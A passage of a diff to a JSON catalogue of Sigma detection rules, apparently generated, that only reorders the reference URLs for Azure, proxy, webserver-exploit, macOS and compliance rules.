"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], "tags": [ @@ -74271,8 +74295,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" ], "tags": [ @@ -74340,10 +74364,10 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], "tags": [ @@ -74426,11 +74450,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ @@ -74991,11 +75015,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], "tags": [ @@ -75020,11 +75044,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ @@ -75157,8 +75181,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://twitter.com/jhencinski/status/1102695118455349248", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ @@ -75483,8 +75507,8 @@ "logsource.product": "No established product", "refs": [ "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" ], "tags": [ @@ -75568,11 +75592,11 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://perishablepress.com/blacklist/ua-2013.txt", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" ], "tags": [ @@ -75716,8 +75740,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" ], "tags": [ @@ -75770,8 +75794,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", "https://twitter.com/craiu/status/1167358457344925696", + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" ], "tags": [ @@ -75915,8 +75939,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.advanced-ip-scanner.com/", "https://www.advanced-port-scanner.com/", + "https://www.advanced-ip-scanner.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" ], "tags": [ @@ -75949,10 +75973,10 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://www.spamhaus.org/statistics/tlds/", "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ @@ -76018,8 +76042,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" ], "tags": [ @@ -76427,8 +76451,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/wugeej/status/1369476795255320580", "https://paper.seebug.org/1495/", + "https://twitter.com/wugeej/status/1369476795255320580", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" ], "tags": [ @@ -76488,9 +76512,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/jas502n/status/1321416053050667009?s=20", - "https://twitter.com/sudo_sudoka/status/1323951871078223874", "https://isc.sans.edu/diary/26734", + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" ], "tags": [ @@ -76524,10 +76548,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", + "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", - "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", - "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" ], "tags": [ @@ -76593,8 +76617,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" ], "tags": [ @@ -76627,8 +76651,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://www.anquanke.com/post/id/226029", + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" ], "tags": [ @@ -76724,8 +76748,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/search?q=CVE-2021-43798", "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" ], "tags": [ @@ -76780,11 +76804,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/sec715/status/1373472323538362371", "https://twitter.com/Al1ex4/status/1382981479727128580", "https://github.com/murataydemir/CVE-2021-27905", - "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", + "https://twitter.com/sec715/status/1373472323538362371", "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", + "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" ], "tags": [ @@ -76818,9 +76842,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://www.yang99.top/index.php/archives/82/", "https://github.com/vnhacker1337/CVE-2022-27925-PoC", - "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" ], "tags": [ @@ -76854,10 +76878,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", - "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" ], "tags": [ @@ -76893,10 +76917,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/payloadbox/sql-injection-payload-list", - "https://brightsec.com/blog/sql-injection-payloads/", "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/payloadbox/sql-injection-payload-list", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" ], "tags": "No established tags" @@ -77021,8 +77045,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" ], "tags": [ @@ -77123,8 +77147,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" ], "tags": [ @@ -77148,10 +77172,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://support.f5.com/csp/article/K52145254", "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://support.f5.com/csp/article/K52145254", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" ], "tags": [ @@ -77184,9 +77208,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://f5.pm/go-59627.html", "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" ], "tags": [ @@ -77252,9 +77276,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/rapid7/metasploit-framework/pull/17407", - "https://github.com/0xf4n9x/CVE-2022-46169", "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", + "https://github.com/0xf4n9x/CVE-2022-46169", + "https://github.com/rapid7/metasploit-framework/pull/17407", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml" ], "tags": [ @@ -77288,12 +77312,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://news.ycombinator.com/item?id=29504755", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" ], "tags": [ @@ -77383,10 +77407,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -77445,8 +77469,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/payloadbox/xss-payload-list", "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/payloadbox/xss-payload-list", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" ], "tags": "No established tags" @@ -77536,8 +77560,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://blog.assetnote.io/2021/11/02/sitecore-rce/", "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" ], "tags": [ @@ -77570,8 +77594,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/apache/spark/pull/36315/files", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" ], @@ -77606,8 +77630,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" ], @@ -77741,9 +77765,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" ], "tags": [ @@ -77776,9 +77800,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" ], "tags": [ @@ -77826,12 +77850,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://news.ycombinator.com/item?id=29504755", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" ], "tags": [ @@ -77930,9 +77954,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.tenable.com/security/research/tra-2021-13", - "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://www.tenable.com/security/research/tra-2021-13", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" ], "tags": [ @@ -77967,8 +77991,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" ], "tags": [ @@ -78069,12 +78093,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", - "https://twitter.com/h4x0r_dz/status/1445401960371429381", "https://twitter.com/bl4sty/status/1445462677824761878", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", "https://twitter.com/ptswarm/status/1445376079548624899", + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" ], "tags": [ @@ -78107,9 +78131,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" ], "tags": [ @@ -78144,9 +78168,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/lijiejie/IIS_shortname_Scanner", "https://www.exploit-db.com/exploits/19525", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://github.com/lijiejie/IIS_shortname_Scanner", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -78326,10 +78350,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://support.citrix.com/article/CTX267027", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", - "https://support.citrix.com/article/CTX267679", "https://isc.sans.edu/diary/25686", + "https://support.citrix.com/article/CTX267679", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://support.citrix.com/article/CTX267027", "https://twitter.com/mpgn_x64/status/1216787131210829826", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" ], @@ -78440,9 +78464,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", - "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" ], "tags": [ @@ -78709,8 +78733,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ @@ -79316,8 +79340,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" ], "tags": [ @@ -79374,9 +79398,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], "tags": [ @@ -79489,8 +79513,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", "https://gist.github.com/Capybara/6228955", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" ], "tags": [ @@ -79548,10 +79572,10 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": "No established tags" @@ -79570,9 +79594,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" @@ -79593,9 +79617,9 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ + 